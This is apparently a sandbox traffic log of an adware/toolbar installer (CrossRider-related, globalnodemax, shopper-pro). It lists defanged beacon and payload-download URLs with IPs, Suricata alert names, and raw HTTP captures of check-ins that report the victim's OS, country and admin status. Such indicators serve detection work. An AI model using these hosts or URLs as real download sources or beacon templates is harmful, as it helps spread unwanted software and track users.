hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402673&lifetime=0&silent=1&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402674&lifetime=0&silent=1&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687
hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=803&action=na&ms_vr=3&clock=22531&rnd=18667	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=1729&action=na&ms_vr=3&clock=22610&rnd=18667	208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?action=uidCreated&userid={A12A645F-7F13-46EC-98C0-57B180FEB515}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&v=1.0.8654.1177&url=&title=&pingtext=&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?action=start&userid={A12A645F-7F13-46EC-98C0-57B180FEB515}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&v=1.0.8654.1177&url=&title=&pingtext=TWljcm9zb2Z0IFdpbmRvd3MgWFAgUHJvZmVzc2lvbmFsIFNlcnZpY2UgUGFjayAzIChidWlsZCAyNjAwKQA=&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://zh9k747-1ghhyl1c.netdna-ssl.com/YTDownloaderFull.exe	198.232.124.192
hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_c	69.16.175.42
hxxp://stats.globalnodemax.com/installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687	54.231.8.164
hxxp://rep.ytdownloader.com/app/ping.ashx?action=uidCreated&userid={A12A645F-7F13-46EC-98C0-57B180FEB515}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&v=1.0.8654.1177&url=&title=&pingtext=&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://dl.ourinputinfonet.com/web/gf/all/setup.exe	69.16.175.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685	54.231.48.42
hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_a	69.16.175.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1438402674	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685	54.231.48.42
hxxp://stats.globalnodemax.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402673&procruntime=7&rnd=1438402680	54.231.8.164
hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_c	69.16.175.42
hxxp://logs.globalnodemax.com/monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402674&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402674	69.16.175.10
hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_b	69.16.175.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685	54.231.48.42
hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_d	69.16.175.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1438402681	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1438402681	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1438402673	54.231.48.42
hxxp://dl.ourinputinfonet.com/spdbt/shoppy/snsch7.exe	69.16.175.42
hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_d	69.16.175.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1438402681	54.231.48.42
hxxp://dnnw5pp7-zxis6jz8.netdna-ssl.com/t.ashx?e=KC46TpkJIZxD761tAXRB5U7/thpU6drhyMlYLXuYTiSJSpJdq6tfQEEt4u7lqt3szjf8TpbxLO738863hYmkYTdCD9FwPsb7YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8	198.232.124.192
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683	54.231.48.42
hxxp://logs.globalnodemax.com/monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402673&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402673	69.16.175.10
hxxp://errors.globalnodemax.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=8&rnd=1438402681	54.231.48.42
hxxp://stats.globalnodemax.com/installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687	54.231.8.164
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_b	69.16.175.42
hxxp://stats.globalnodemax.com/installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402674&procruntime=6&rnd=1438402680	54.231.8.164
hxxp://stats.globalnodemax.com/apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402674&lifetime=0&silent=1&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687	54.231.8.164
hxxp://stats.globalnodemax.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402673&lifetime=0&silent=1&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687	54.231.8.164
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_e	69.16.175.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685	54.231.48.42
hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_a	69.16.175.42
hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_e	69.16.175.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1438402681	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686	54.231.48.42
hxxp://errors.globalnodemax.com/installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=7&rnd=1438402681	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684	54.231.48.42
hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685	54.231.48.42

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Executable served from Amazon S3
ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
ET MALWARE Win32/Toolbar.CrossRider.A Checkin
SURICATA STREAM FIN out of window
SURICATA STREAM SHUTDOWN RST invalid ack

Traffic

GET /app/ping.ashx?e=hNMAVKhukry7P4fECSsJwloXilXt x7lK8Uk6qaOqbIicvsFwQStENB87jgWTbK/3s5q cLFxyzJSKLVhW6rmW/5rCyD2Xgytgv4rmtJTtdjDTVY3IA3SiiQud1Q24EcqWLfaltpxWwAXYMT8ICd7 DRrDOGNmxc8Y9D7ZpfrCVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxQzFrZZ4espH98S7GEeR3AenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIaibNUAqLVJBBHIQSAUi/qZ6ui3jv/3sP3EbLWmTIe6HPSZuizlKZS4vVGidJQzQbwcX153juosly7z014jPGHi9SV3844bx1g== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Length: 0

....

GET /app/ping.ashx?e=A3ANzFv7fWAr54jemLLd4FoXilXt x7l6DyKvcFN9VsicvsFwQStENB87jgWTbK/3s5q cLFxyzJSKLVhW6rmW/5rCyD2Xgytgv4rmtJTtdjDTVY3IA3Sq2mie6K97bhs4164GCUCrHY6 CMJNDnNZ iO0G7IbrOitH7JkWOxZfyfwmWa4R8zkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mKGC96/uInTgPCo jLvL970WABgPsiU45GNURXUmydpYo7BIbpw2ovuk hMOF3swzZcIrLF/KDw30Dx2m 0F47aFzcNuM2tbw FqU0ZF4YO51d/yz32tmquaHkbuQuAqpFpXrulLecGSS4ZuIyp4CyD0lZpzINt8A HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 01 Aug 20
15 04:17:07 GMT..Content-Length: 0......

GET /app/ping.ashx?e=Ka qOJkckoWKccrnLzDz3jyMpz1Liwuqg5GyWpM1 hSRoZJTpqsyZxASc9FSZWyorVov04UjcEgpkJMMnIn2/i1ccdUWYYSC0dynvbrq8d7wsHnwsxHHbdtgpjL3X7N9nl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSshtYpX C0wZa7n9ZpCSa7IeXQbvelEWRhJzI6WjgFlNrd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 01 Aug 2015 04:17:08 GMT

Content-Length: 0

....

GET /app/ping.ashx?e=siwKo8d7dVSIItTUp4SEbQJu76sBMJpY2YTeaOaZJPFysSIQM/WMqhsgZm851Wm7Y4rWxtGruLEcdSxeBQrefTtdlsQvNjEsRp4Ckp mcZt7HEv67ptHclD/oBpUX5crnl1xOKDZuhX43G01TipW9rNM1MftkI9RcnDbXMoNEWZfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxQzFrZZ4espH98S7GEeR3AenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIQNLH6TecF 3BHIQSAUi/qZ6ui3jv/3sP3EbLWmTIe6HPSZuizlKZS4vVGidJQzQbwcX153juosly7z014jPGHi9SV3844bx1g== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 01 Aug 2015 04:17:08 GMT

Content-Length: 0

GET / HTTP/1.1

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:51 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

